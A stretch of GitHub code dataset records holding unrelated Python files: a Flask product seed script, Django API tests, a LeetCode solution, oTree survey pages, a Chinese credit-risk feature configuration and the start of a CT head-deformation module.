your ears after about 10 minutes. If you but this I know that pain',\n price=8621.00\n )\n product20 = Product(\n owner_id=6,\n name='Kylo Rens Charger',\n description='This is definitely a charging cord that someone will \"borrow\" and never give back. It almost reminds me of Kylo Rens lightsaber.',\n price=789.00\n )\n product21 = Product(\n owner_id=6,\n name='Its A Tape Measure',\n description='Its uh... its just a tape measure... Used to.. measure stuff..',\n price=79.49\n )\n product22 = Product(\n owner_id=1,\n name='Bluetooth Insole',\n description='These insoles will take your feet far in life. 
If your feet get sore like mine do, these new magic insoles will use bluetooth technology to track how much you walk, send it to your phone and tell you to stop walking',\n price=5600.00\n )\n\n db.session.add(product1)\n db.session.add(product2)\n db.session.add(product3)\n db.session.add(product4)\n db.session.add(product5)\n db.session.add(product6)\n db.session.add(product7)\n db.session.add(product8)\n db.session.add(product9)\n db.session.add(product10)\n db.session.add(product11)\n db.session.add(product12)\n db.session.add(product13)\n db.session.add(product14)\n db.session.add(product15)\n db.session.add(product16)\n db.session.add(product17)\n db.session.add(product18)\n db.session.add(product19)\n db.session.add(product20)\n db.session.add(product21)\n db.session.add(product22)\n db.session.commit()\n\n\ndef undo_products():\n if environment == \"production\":\n db.session.execute(f\"TRUNCATE table {SCHEMA}.products RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(\"DELETE FROM products\")\n\n db.session.commit()\n","repo_name":"Cahzzm/Phish","sub_path":"Phish/app/seeds/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"5070814365","text":"from django.contrib.auth.models import User\nimport json\nimport vcr\n\nfrom .models import Vinculum, RemoteResources, InputOutputPath\nfrom rest_framework.test import APITestCase\nfrom rest_framework import status\n\nfrom serializers import VinculumSerializer\n\n\nclass VinculumSerializeTest(APITestCase):\n\n def setUp(self):\n self.user = User.objects.create_user('testuser', email='testuser@test.com', password='testing')\n self.user.save()\n self.data = {\n \"title\": \"Actual real data\",\n \"root_path\": \"/mjk4\",\n \"remote_resources\": [{\n \"authentication_behavior\": \"none\",\n \"remote_resource_path\": 
\"https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20in%20(select%20woeid%20from%20geo.places(1)%20where%20text%3D%22nome%2C%20ak%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys\",\n \"io_paths\": [{\n \"input_path\": \"query.results.channel\",\n \"output_path\": \"yahoo.weather\"\n }]\n }]\n }\n self.data_string = json.dumps(self.data)\n self.data_json = json.loads(self.data_string)\n\n self.remote_resource_path = \"https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20in%20(select%20woeid%20from%20geo.places(1)%20where%20text%3D%22nome%2C%20ak%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys\"\n\n def _require_login(self):\n self.client.login(username='testuser', password='testing')\n\n def _login_post_vinculum(self, data_to_post=None, cassette=None):\n\n self._require_login()\n\n if data_to_post is None:\n data_to_post = json.loads(self.data_string)\n\n response = self.client.post('/vinculums/', data_to_post, format='json')\n return response\n\n def _helper_deleted_blank_fields(self, field_to_test, post_vinculum):\n # TODO: Move this into a library for just itself\n data_to_post_deleted = self.data_json.copy()\n data_to_post_blank = self.data_json.copy()\n\n data_to_post_deleted.pop(field_to_test)\n response = post_vinculum(data_to_post_deleted)\n self.assertEqual(response.content,\n '{\"%s\":[\"This field is required.\"]}' % field_to_test)\n\n data_to_post_blank[field_to_test] = None\n response = post_vinculum(data_to_post_blank)\n\n self.assertEqual(response.content,\n '{\"%s\":[\"This field may not be null.\"]}' % field_to_test)\n\n def test_was_vinclum_correctly_serialized(self):\n\n response = self._login_post_vinculum()\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n vinculum_id = response.data['id']\n vinculum = Vinculum.objects.get(pk=vinculum_id)\n self.assertTrue(isinstance(vinculum, Vinculum))\n\n 
serialized_vinculum = VinculumSerializer(vinculum)\n\n # self.assertTrue(serialized_vinculum.is_valid())\n # serialized_vinculum_data = serialized_vinculum.validated_data\n # TODO: Find out why this validated_data is different from just plain old 'data' member\n\n serialized_vinculum_data = serialized_vinculum.data\n\n self.assertEqual(len(self.data_json['remote_resources']),\n len(serialized_vinculum_data['remote_resources'])\n )\n\n self.assertEqual(serialized_vinculum_data['remote_resources'][0]['remote_resource_path'],\n self.remote_resource_path)\n\n self.assertEqual(len(self.data_json['remote_resources'][0]['io_paths']),\n len(serialized_vinculum_data['remote_resources'][0]['io_paths'])\n )\n\n self.assertEqual(serialized_vinculum_data['remote_resources'][0]['io_paths'][0]['input_path'],\n \"query.results.channel\")\n self.assertEqual(serialized_vinculum_data['remote_resources'][0]['io_paths'][0]['output_path'],\n \"yahoo.weather\")\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/was_vinculum_correctly_stored')\n def test_was_vinculum_correctly_stored(self):\n\n response = self._login_post_vinculum()\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n vinculum_id = response.data['id']\n\n self.assertEqual(Vinculum.objects.count(), 1)\n self.assertEqual(RemoteResources.objects.count(), 1)\n self.assertEqual(InputOutputPath.objects.count(), 1)\n\n remoteresources = RemoteResources.objects.all()[:1].get()\n self.assertEqual(remoteresources.remote_resource_path, self.remote_resource_path)\n self.assertEqual(remoteresources.authentication_behavior, \"none\")\n self.assertEqual(remoteresources.vinculum_id, vinculum_id)\n\n io_paths = InputOutputPath.objects.all()[:1].get()\n self.assertEqual(io_paths.input_path, \"query.results.channel\")\n self.assertEqual(io_paths.output_path, \"yahoo.weather\")\n self.assertEqual(io_paths.remote_resource_id, remoteresources.id)\n\n 
@vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_root_path_missing')\n def test_vinculum_needs_root_path(self):\n # Test to see what happens when root_path is missing entirely\n\n field_to_test = 'root_path'\n\n data_to_post_deleted = json.loads(self.data_string)\n\n data_to_post_deleted.pop(field_to_test)\n\n response = self._login_post_vinculum(data_to_post_deleted)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.content,\n '{\"%s\":[\"This field is required.\"]}' % field_to_test)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_root_path_blank')\n def test_vinculum_needs_root_path_not_none(self):\n # what happens if root_path is present but none\n field_to_test = 'root_path'\n\n data_to_post_blank = self.data_json.copy()\n\n data_to_post_blank[field_to_test] = None\n response = self._login_post_vinculum(data_to_post_blank, cassette='test_artifacts/vcr_cassettes/vinculum_needs_root_path_blank')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n self.assertEqual(response.content,\n '{\"%s\":[\"This field may not be null.\"]}' % field_to_test)\n\n self._helper_deleted_blank_fields('root_path',\n self._login_post_vinculum)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_remote_resources_missing')\n def test_vinculum_needs_remote_resources(self):\n # test to see what happens when remote_resources is missing\n field_to_test = 'remote_resources'\n\n data_to_post_deleted = self.data_json.copy()\n\n data_to_post_deleted.pop(field_to_test)\n response = self._login_post_vinculum(data_to_post_deleted)\n self.assertEqual(response.content,\n '{\"%s\":[\"This field is required.\"]}' % field_to_test)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_needs_remote_resources_blank')\n def test_vinculum_needs_remote_resources_blank(self):\n # test to see what happens when remote_resources is none\n\n field_to_test = 'remote_resources'\n\n 
data_to_post_blank = json.loads(self.data_string)\n\n data_to_post_blank[field_to_test] = None\n response = self._login_post_vinculum(data_to_post_blank)\n\n self.assertEqual(response.content,\n '{\"%s\":[\"This field may not be null.\"]}' % field_to_test)\n\n @vcr.use_cassette('test_artifacts/vcr_cassettes/vinculum_is_running')\n def test_vinculum_is_running(self):\n\n response = self._login_post_vinculum()\n vinculum_id = response.data['id']\n vinculum = Vinculum.objects.get(pk=vinculum_id)\n self.assertTrue(isinstance(vinculum, Vinculum))\n\n response = self.client.get('/vinculums/' + str(vinculum_id) + '/running' , format='json')\n\n returned_data = response.json()\n self.assertTrue(response)\n self.assertTrue(response.status_code==200)\n self.assertTrue(returned_data['pk'] == '1')\n self.assertTrue(returned_data['running'] == True)","repo_name":"linearregression/vinculum_control_panel","sub_path":"vinculum/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36411259309","text":"class Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n '''\n 跟 200 的思路一样,只是需要注意如何在 dfs 中进行适当的返回\n :param grid:\n :return:\n\n time: O(R*C)\n space: O(R*C)\n R 是行,C 是列\n '''\n def dfs(i, j):\n count = 0\n if 0 <= i < m and 0 <= j < n and grid[i][j] == 1:\n grid[i][j] = 2\n count += 1\n return count + dfs(i + 1, j) + dfs(i - 1, j) + dfs(i, j + 1) + dfs(i, j - 1)\n else:\n return 0\n\n m, n = len(grid), len(grid[0])\n max_count = 0\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if grid[i][j] == 1:\n count = dfs(i, j)\n max_count = max(count, max_count)\n return max_count\n","repo_name":"cicihou/LearningProject","sub_path":"leetcode-py/leetcode695.py","file_name":"leetcode695.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
+{"seq_id":"36192909242","text":"from otree.api import Currency as c, currency_range\nfrom ._builtin import Page, WaitPage\nfrom .models import Constants\nimport os, json, pandas\nimport paramiko, random\n\nclass Alignment_info(Page):\n form_model = 'player'\n form_fields = ['name', 'student_id', 'exp_date']\n\n\nclass Instruction(Page):\n def before_next_page(self):\n pwd = os.getcwd()\n emo_order_file = self.session.config['order_file']\n dscp_file = self.session.config['emo_dscp_file']\n\n folder = 'reference'\n dscp_path = os.path.join(pwd, folder, dscp_file)\n order_path = os.path.join(pwd, folder, emo_order_file)\n\n with open(dscp_path, 'r', encoding='utf-8') as file_object:\n dscp_data = json.load(file_object)\n\n if self.session.config['mode'] == 0:\n order, order_code = order_retrieval(order_path)\n elif self.session.config['mode'] == 1:\n order, order_code = order_retrieval_future(order_path)\n\n emotions = order\n emo_dscp = [dscp_data[i] for i in emotions]\n\n alphas = ['C', 'F']\n random.shuffle(alphas)\n\n self.participant.vars['emotions'] = emotions\n self.participant.vars['emo_dscp'] = emo_dscp\n\n self.participant.vars['alphas'] = alphas\n\n self.player.emo_order = '_'.join(emotions)\n self.player.emo_order_code = order_code\n\n def vars_for_template(self):\n exp_theme = '回忆' if self.session.config['mode'] == 0 else '想象'\n time = self.session.config['time']\n return dict(\n exp_theme=exp_theme,\n time=time\n )\n\n\npage_sequence = [Instruction, Alignment_info]\n\n\ndef order_retrieval(order_path):\n order_data = pandas.read_table(order_path, sep='\\t')\n for i in range(24):\n used = order_data['used'].iloc[i]\n get = used == 0\n if get:\n order_data.iloc[i, 1] = 1\n order = [\n order_data['0'].iloc[i],\n order_data['1'].iloc[i],\n order_data['2'].iloc[i],\n order_data['3'].iloc[i],\n order_data['4'].iloc[i]\n ]\n order_code = order_data['code'].iloc[i]\n break\n continue\n\n order_data.to_csv(order_path, sep='\\t', index=False)\n\n return order, 
order_code\n\n\ndef order_retrieval_future(order_path):\n order_data = pandas.read_table(order_path, sep='\\t')\n for i in range(108):\n used = order_data['used'].iloc[i]\n get = used == 0\n if get:\n order_data.iloc[i, 1] = 1\n order = [\n order_data['0'].iloc[i],\n order_data['1'].iloc[i],\n order_data['2'].iloc[i]\n ]\n order_code = order_data['code'].iloc[i]\n break\n continue\n\n order_data.to_csv(order_path, sep='\\t', index=False)\n\n return order, order_code\n\n","repo_name":"liufuju/Exp1_mixed","sub_path":"instructions/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17501126900","text":"# -*- coding:utf-8 -*-\n########################################################################################################################\n# 全局配置清单\n########################################################################################################################\n\n\"\"\"\n 全局清单配置\n\n\"\"\"\n\n\"\"\"\n国内省份列表\n\n\"\"\"\n# 省份元组\nPROVINCE_LIST = (u'山东', u'江苏', u'上海', u'浙江', u'安徽', u'福建', u'江西', u'广东', u'广西', u'海南', u'河南',\n u'湖南', u'湖北', u'北京', u'天津', u'河北', u'山西', u'内蒙古', u'宁夏', u'青海', u'陕西', u'甘肃',\n u'新疆', u'四川', u'贵州', u'云南', u'重庆', u'西藏', u'辽宁', u'吉林', u'黑龙江', u'香港', u'澳门',\n u'台湾', u'全国', u'运营商')\n\"\"\"\n中国省份区域划分\n1 ====> 华东地区(包括山东、江苏、上海、浙江、安徽、福建、江西)HD\n2 ====> 华南地区(包括广东、广西、海南)HN\n3 ====> 华中地区(包括河南、湖南、湖北)HZ\n4 ====> 华北地区(包括北京、天津、河北、山西、内蒙古)HB\n5 ====> 西北地区(包括宁夏、青海、陕西、甘肃、新疆)XB\n6 ====> 西南地区(包括四川、贵州、云南、重庆、西藏)XN\n7 ====> 东北地区(包括辽宁、吉林、黑龙江)DB\n8 ====> 港澳台地区(包括香港、澳门、台湾)GAT\n\n\"\"\"\nPROVINCE_MAP_DICT = {u'山东': 1, u'江苏': 1, u'上海': 1, u'浙江': 1, u'安徽': 1, u'福建': 1, u'江西': 1,\n u'广东': 2, u'广西': 2, u'海南': 2,\n u'河南': 3, u'湖南': 3, u'湖北': 3,\n u'北京': 4, u'天津': 4, u'河北': 4, u'山西': 4, u'内蒙古': 4,\n u'宁夏': 5, u'青海': 5, u'陕西': 5, u'甘肃': 5, u'新疆': 5,\n u'四川': 6, u'贵州': 6, u'云南': 6, u'重庆': 6, u'西藏': 6,\n u'辽宁': 7, u'吉林': 7, u'黑龙江': 7,\n 
u'香港': 8, u'澳门': 8, u'台湾': 8,\n u'全国': 9, u'运营商': 9, u'未知': 9}\n\n# 经济较发达省份 edp\nECONOMICALLY_DEVELOPED_PROVINCES = [u'广东', u'江苏', u'山东', u'浙江', u'四川', u'北京', u'上海']\n# 老赖top 10 省份 dpt\nDEADBEAT_PROVINCES_TOP10 = [u'江苏', u'山东', u'浙江', u'河南', u'广东', u'安徽', u'福建', u'重庆', u'黑龙江', u'四川']\n\n\"\"\"\n发达国家列表 世界公认18个发达国家 ddc\n\n\"\"\"\nDEVELOPED_COUNTRY = [u'美国', u'加拿大', u'日本', u'英国', u'法国', u'德国', u'意大利', u'荷兰', u'比利时', u'卢森堡',\n u'瑞士', u'奥地利', u'挪威', u'瑞典', u'丹麦', u'芬兰', u'澳大利亚', u'新西兰']\n\n\"\"\"\n信用卡逾期高发省份 cc_hrp\n\n1 天津 2 江西 3 重庆 4 四川 5 黑龙江 6 福建\n\n\"\"\"\nCC_HIGH_RISK_PROVINCES = [u'天津', u'福建', u'江西', u'重庆', u'四川', u'黑龙江']\n\n\"\"\"\n用户行为检查特征结果列表 用于结果检查 behavior_check_result_list\n\n\"\"\"\n\nBEHAVIOR_CHECK_TUPLE = ('user_mobile_use_time', 'cpc_user_no_call_days', 'cpc_user_3days_no_call_cnt',\n 'cpc_user_max_silent_days', 'cpc_user_silent_days', 'cpc_user_high_risk_cnt',\n 'cpc_user_high_risk_cnt_ratio', 'user_if_contact_am', 'user_if_contact_110',\n 'user_if_contact_120', 'user_if_contact_lawyer', 'user_if_contact_court',\n 'user_call_night_fre', 'user_call_loan_fre', 'user_call_bank_fre', 'user_call_cc_fre',\n 'user_address_use_in_eb_fre', 'user_eb_use_fre', 'user_eb_self_use_fre', 'user_vg_buy_fre',\n 'user_lt_buy_fre', 'user_address_change_fre')\n\"\"\"\n通话信息字段表\n\n\"\"\"\nUSER_CONTACT_COLUMNS = ('call_cnt', 'call_in_cnt', 'call_out_cnt', 'contact_1m', 'contact_1w', 'contact_3m',\n 'contact_3m_plus', 'contact_afternoon', 'contact_early_morning', 'contact_holiday',\n 'contact_morning', 'contact_night', 'contact_noon', 'contact_weekday', 'contact_weekend')\n\nUSER_CONTACT_RESULT = ('call', 'call_in', 'call_out', 'contact_p1m', 'contact_p1w', 'contact_p3m', 'contact_po3m',\n 'contact_afternoon', 'contact_early_morning', 'contact_holiday', 'contact_morning',\n 'contact_night', 'contact_noon', 'contact_weekday', 'contact_weekend')\n\n\nCHINA_LOC = ('HD', 'HN', 'HZ', 'HB', 'XB', 'XN', 'DB', 'GAT')\n\nCONTACT_REGION = (u'region_avg_call_in_time', 
u'region_avg_call_out_time', u'region_call_in_cnt',\n u'region_call_in_cnt_pct', u'region_call_in_time', u'region_call_in_time_pct',\n u'region_call_out_cnt', u'region_call_out_cnt_pct', u'region_call_out_time',\n u'region_call_out_time_pct', u'region_uniq_num_cnt')\n\nCELL_BEHAVIOR = (u'cpc_call_cnt_p6m', u'cpc_avg_call_cnt_p6m',\n u'cpc_call_in_cnt_p6m', u'cpc_avg_call_in_cnt_p6m',\n u'cpc_call_out_cnt_p6m', u'cpc_avg_call_out_cnt_p6m',\n u'cpc_call_in_time_p6m', u'cpc_avg_call_in_time_p6m',\n u'cpc_call_out_time_p6m', u'cpc_avg_call_out_time_p6m',\n u'cpc_net_flow_p6m', u'cpc_avg_net_flow_p6m', u'cpc_sms_cnt_p6m',\n u'cpc_avg_sms_cnt_p6m', u'cpc_call_cnt_p3m',\n u'cpc_avg_call_cnt_p3m', u'cpc_call_in_cnt_p3m',\n u'cpc_avg_call_in_cnt_p3m', u'cpc_call_out_cnt_p3m',\n u'cpc_avg_call_out_cnt_p3m', u'cpc_call_in_time_p3m',\n u'cpc_avg_call_in_time_p3m', u'cpc_call_out_time_p3m',\n u'cpc_avg_call_out_time_p3m', u'cpc_net_flow_p3m',\n u'cpc_avg_net_flow_p3m', u'cpc_sms_cnt_p3m', u'cpc_avg_sms_cnt_p3m',\n u'cpc_call_cnt_p2m', u'cpc_avg_call_cnt_p2m', u'cpc_call_in_cnt_p2m',\n u'cpc_avg_call_in_cnt_p2m', u'cpc_call_out_cnt_p2m',\n u'cpc_avg_call_out_cnt_p2m', u'cpc_call_in_time_p2m',\n u'cpc_avg_call_in_time_p2m', u'cpc_call_out_time_p2m',\n u'cpc_avg_call_out_time_p2m', u'cpc_net_flow_p2m',\n u'cpc_avg_net_flow_p2m', u'cpc_sms_cnt_p2m', u'cpc_avg_sms_cnt_p2m',\n u'cpc_call_cnt_p1m', u'cpc_call_in_cnt_p1m', u'cpc_call_out_cnt_p1m',\n u'cpc_call_in_time_p1m', u'cpc_call_out_time_p1m', u'cpc_net_flow_p1m',\n u'cpc_sms_cnt_p1m')\n\nTRIP_INFO_RESULT = (\n u'cpc_trip_long_tsp', u'cpc_trip_his_cnt',\n u'cpc_trip_his_total_days', u'cpc_trip_his_avg_days',\n u'cpc_trip_his_tll_cnt', u'cpc_trip_his_tdl_cnt',\n u'cpc_trip_his_fp_pct', u'cpc_trip_his_fp_total_cnt',\n u'cpc_trip_his_fp_total_cnt_ratio', u'cpc_trip_his_fet_tsp',\n u'cpc_trip_his_let_tsp', u'cpc_trip_holiday_total_pct',\n u'cpc_trip_holiday_total_pct_ratio', u'cpc_trip_holiday_days_cnt',\n 
u'cpc_trip_holiday_avg_days', u'cpc_trip_holiday_days_cnt_ratio',\n u'cpc_trip_weekend_total_pct', u'cpc_trip_weekend_total_pct_ratio',\n u'cpc_trip_weekend_days_cnt', u'cpc_trip_weekend_avg_days',\n u'cpc_trip_weekend_days_cnt_ratio', u'cpc_trip_workday_total_pct',\n u'cpc_trip_workday_total_pct_ratio', u'cpc_trip_workday_days_cnt',\n u'cpc_trip_workday_avg_days', u'cpc_trip_workday_days_cnt_ratio',\n u'cpc_trip_tll_esb_pct', u'cpc_trip_tll_esb_total_days',\n u'cpc_trip_tdl_esb_pct', u'cpc_trip_tdl_esb_total_days',\n u'cpc_trip_tll_esm_pct', u'cpc_trip_tll_esm_total_days',\n u'cpc_trip_tdl_esm_pct', u'cpc_trip_tdl_esm_total_days',\n u'cpc_trip_tll_esb_pct_ratio', u'cpc_trip_tll_esb_total_days_ratio',\n u'cpc_trip_tdl_esb_pct_ratio', u'cpc_trip_tdl_esb_total_days_ratio',\n u'cpc_trip_tll_esm_pct_ratio', u'cpc_trip_tll_esm_total_days_ratio',\n u'cpc_trip_tdl_esm_pct_ratio', u'cpc_trip_tdl_esm_total_days_ratio')\n\nORG_TYPE = (\n u'租车', u'招聘', u'房地产', u'电商', u'银行', u'运营商', u'支付', u'投资理财', u'贷款', u'汽车', u'个人',\n u'健身', u'互联网', u'投资担保', u'贷款/融资', u'保险', u'短号', u'基金', u'旅游出行', u'快递', u'APP软件',\n u'政府机构', u'婚庆'\n)\n\nORG_RESULT = ('crt', 'rec', 'res', 'eb', 'bank', 'opt', 'pay', 'iaf', 'loan', 'car', 'ps',\n 'gym', 'net', 'ig', 'lof', 'ins', 'sn', 'fund', 'trv', 'exp', 'app', 'gov', 'wed')\n\nSERVICE_TIME_TAGS = ('p1m', 'p2m', 'p3m')\n\nSR_0 = ['cpc_ser_%s_cnt' % i for i in ORG_RESULT]\nSR_1 = ['cpc_ser_%s_org_cnt' % i for i in ORG_RESULT]\nSR_2 = ['cpc_ser_%s_cnt_%s' % (k, v) for k in ORG_RESULT for v in SERVICE_TIME_TAGS]\nSR_3 = ['cpc_ser_%s_org_cnt_%s' % (k, v) for k in ORG_RESULT for v in SERVICE_TIME_TAGS]\nSR_4 = ['cpc_ser_%s_cnt_ratio_%s' % (k, v) for k in ORG_RESULT for v in SERVICE_TIME_TAGS]\nSR_5 = ['cpc_ser_%s_cnt_ratio' % i for i in ORG_RESULT]\nSR_6 = ['cpc_avg_ser_%s_cnt_p3m' % i for i in ORG_RESULT]\nSR_B = ['cpc_total_ser_cnt_%s', 'cpc_total_ser_org_cnt_%s', 'cpc_total_ser_org_type_cnt_%s']\nSR_7 = [k % v for k in SR_B for v in SERVICE_TIME_TAGS]\nS = 
('cpc_total_ser_cnt', 'cpc_total_ser_org_cnt', 'cpc_total_ser_org_type_cnt')\nSERVICE_RESULT = S + tuple(SR_0) + tuple(SR_1) + tuple(SR_2) + tuple(SR_3) + tuple(SR_4) + tuple(SR_5) + tuple(SR_6) + \\\n tuple(SR_7)\n\n# cpc_total_ser_cnt_p1m\n# cpc_total_ser_org_cnt_p1m\n# cpc_total_ser_org_type_cnt_p1m\n#\n# cpc_total_ser_cnt_p2m\n# cpc_total_ser_org_cnt_p2m\n# cpc_total_ser_org_type_cnt_p2m\n#\n# cpc_total_ser_cnt_p3m\n# cpc_total_ser_org_cnt_p3m\n# cpc_total_ser_org_type_cnt_p3m\n\n\n\n","repo_name":"lengqingxiao/Honey","sub_path":"honeybee_dev_5.0/gauss/config/global_config.py","file_name":"global_config.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40319011551","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 16 13:58:20 2022\n\n@author: mgar5380\n\"\"\"\n#External Modules\nimport os\nimport json\nimport SimpleITK as sitk\nfrom pathlib import Path\n\n#Platipy Modules\nfrom platipy.dicom.io.crawl import process_dicom_directory\nfrom platipy.dicom.io.nifti_to_rtstruct import convert_nifti\nfrom platipy.dicom.io.nifti_to_series import convert_nifti_to_dicom_series\n\n#CTHeadDeformation Modules\nfrom DeformHeadCT.DataPreparation import (\n MoveDCMFiles,\n GetPointOfRotation\n )\n\n\"\"\"\nTODO\nAdd more input checking options\nAdd gaussian smoothing option for both head rotation and GTV shift\n\"\"\"\n\nclass VolumeDeformation:\n \n def __init__(self,InfoFile = '',patient_id = '',patientunderscore = '',axes = [],angles = [],\n InputDir = '',StructDir = '',OutputDir = '/Output',nifti_directory = '/temp',Structure_Shift = '',\n Structure_Names = '',coordinates_cutoff = [], VertDict = {}, verbose=True):\n '''\n\n Parameters\n ----------\n InfoFile : str, optional\n The file location of the .json file containing the information about the volume being deformed. If empty variables need to be \n manually entered. 
If InfoFile is not empty all initial variables are extracted from json file. The default is ''.\n patient_id : str, optional\n patient id as described by the dicom file. The default is ''.\n patientunderscore : str, optional\n patient_id but blank spaces are replaced by underscores. If empty the patientunderscore will be genreated using patient_id. \n The default is ''.\n axes : array, optional\n nx3 array where the nth element is the axis around which the volume will rotate. See wiki for more info The default is [].\n angles : (float | arr), optional\n angles of rotation. If empty no head rotation will be done. The default is [].\n InputDir : str, optional\n Directory of the ct dicom files to be deformed. The default is ''.\n StructDir : str, optional\n Location of the STRUCT dicom file. The default is ''.\n OutputDir : str, optional\n Directory where the dicom values of the deformed CT will be written to. The default is '/Output'.\n nifti_directory : str, optional\n Location of the temp directory where temporary files will be written to. The default is '/temp'.\n Structure_Shift : array, optional\n 1x3 array describing the magnitude of the rigid displacement of the structures in \"Structure_Names\". The default is ''.\n Structure_Names : (str | array), optional\n The structures to be shifted. The default is ''.\n coordinates_cutoff : array, optional\n 2x3 array annotating the co-ordinates that seperate the head and the shoulders. See the wiki for more information. The default is [].\n VertDict : dict, optional\n Voxel location of the intervertebral gaps for the CT scan to be deformed. The default is {}.\n verbose : bool, optional\n If True all the warning messages will be displayed. Messages can be useful for debugging. 
If False no messages displayed.\n The default is True.\n\n Returns\n -------\n None.\n\n '''\n if InfoFile:\n if verbose:\n print('Defining volume parameters using input json file')\n \n #Read json file\n with open(InfoFile) as json_file:\n data = json.load(json_file) \n \n self.patient_id = data['name']\n \n self.patientunderscore = self.patient_id.replace('-','_').upper()\n \n if 'axes' in data:\n self.axes = data['axes']\n else:\n self.axes = ''\n\n if 'angles' in data:\n self.angles = data['angles']\n if 'coordinates_cutoff' in data:\n self.coordinates_cutoff = data['coordinates_cutoff']\n else:\n if verbose:\n print('No \"coordinates_cutoff\" variable detected')\n \n self.point_of_rotation = GetPointOfRotation(data)\n else:\n self.angles = ''\n if verbose:\n print('No Head Rotations detected, determined by \"angles\" variable') \n \n if 'InputDirectory' in data:\n self.InputDir = data['InputDirectory']\n else:\n if verbose:\n print('No \"InputDirectory\" variable detected in input json file')\n self.InputDir = -1 \n \n if 'OutputDirectory' in data:\n self.OutputDir = data['OutputDirectory']\n else:\n self.OutputDir = ''\n if verbose:\n print('No \"OutputDirectory\" variable detected in input json file')\n \n if 'TempDirectory' in data:\n self.nifti_directory = Path(data['TempDirectory']) \n else:\n self.nifti_directory = ''\n if verbose:\n print('No \"TempDirectory\" variable detected in input json file')\n \n if 'StructureFile' in data:\n self.StructDir = data['StructureFile']\n \n if 'Structure_Names' in data and 'Structure_Shift' in data:\n self.Structure_Names = data['Structure_Names']\n self.Structure_Shift = data['Structure_Shift']\n else:\n if verbose:\n print('Variable \"Structure_Names\" or \"Structure_Shift\" not provided')\n \n else:\n self.StructDir = ''\n if verbose:\n print('No \"StructureFile\" variable detected in Input Json File')\n\n else:\n if verbose:\n print('Defining volume parameters manually')\n \n self.patient_id = patient_id\n \n #If 
patientunderscore variable not entered then it can be created using patient_id\n if not patientunderscore:\n self.patientunderscore = self.patient_id.replace('-','_')\n else:\n self.patientunderscore = patientunderscore\n \n self.axes = axes\n self.angles = angles\n self.Structure_Shift = Structure_Shift\n self.coordinates_cutoff = coordinates_cutoff\n \n self.InputDir = InputDir\n self.StructDir = StructDir\n self.OutputDir = OutputDir\n self.nifti_directory = Path(nifti_directory)\n self.Structure_Names = Structure_Names\n \n data = {};\n data['axes'] = self.axes\n if 'Oc-C1' in VertDict:\n data['Oc-C1'] = VertDict['Oc-C1']\n if 'C1-C2' in VertDict:\n data['C1-C2'] = VertDict['C1-C2']\n if 'C2-C3' in VertDict:\n data['C2-C3'] = VertDict['C2-C3']\n #Other vertebrae added in case a more complex model gets used in the future but not needed\n if 'C3-C4' in VertDict:\n data['C3-C4'] = VertDict['C3-C4']\n if 'C4-C5' in VertDict:\n data['C4-C5'] = VertDict['C4-C5']\n if 'C5-C6' in VertDict:\n data['C5-C6'] = VertDict['C5-C6']\n if 'C6-C7' in VertDict:\n data['C6-C7'] = VertDict['C6-C7']\n \n self.point_of_rotation = GetPointOfRotation(data)\n \n # Create output and temporary directories if they don't already exist\n Path.mkdir(self.nifti_directory,parents=False, exist_ok=True)\n Path.mkdir(Path(self.OutputDir),parents=False, exist_ok=True) \n \n \n def PrepareDcmData(self):\n \n \"\"\"\n Put the dicom files into the format required by platipy, and convert the dicom files to nifti files. 
\n Nifti files stored in TempDirectory.\n \n \"\"\"\n \n #Move input dicom files into one folder \n input_dcm_dir = str(self.nifti_directory) + '/dicom'\n Path.mkdir(Path(input_dcm_dir),parents=False, exist_ok=True)\n \n #Create dicom/ct\n input_dcm_ct_dir = input_dcm_dir + '/ct'\n Path.mkdir(Path(input_dcm_ct_dir),parents=False, exist_ok=True)\n MoveDCMFiles(self.InputDir,input_dcm_ct_dir)\n \n #If Structure shift is required, move structure information into dicom/rtstruct\n if self.StructDir:\n input_dcm_struct_dir = input_dcm_dir + '/rtstruct'\n Path.mkdir(Path(input_dcm_struct_dir),parents=False, exist_ok=True)\n MoveDCMFiles(self.StructDir,input_dcm_struct_dir)\n \n #Convert from dicom volumes to nifti volumes. Should auto detect if there is or isn't a struct dir\n process_dicom_directory(input_dcm_dir,output_directory=self.nifti_directory,verbose=True)\n \n def WriteVolumesToFile(self,image_ct_deformed,structShiftFlag=0,deformed_structures = {}):\n \"\"\"\n Write the deformed ct volume and structures to dicom formats in the directory OutputDir\n\n Parameters\n ----------\n image_ct_deformed : SimpleITK.Image\n The deformed ct image.\n structShiftFlag : bool or int or whatever, optional\n If true the structures in deformed_structures flag will be written. If 0 then only the image_ct_deformed will be written\n deformed_structures : TYPE, optional\n DESCRIPTION. 
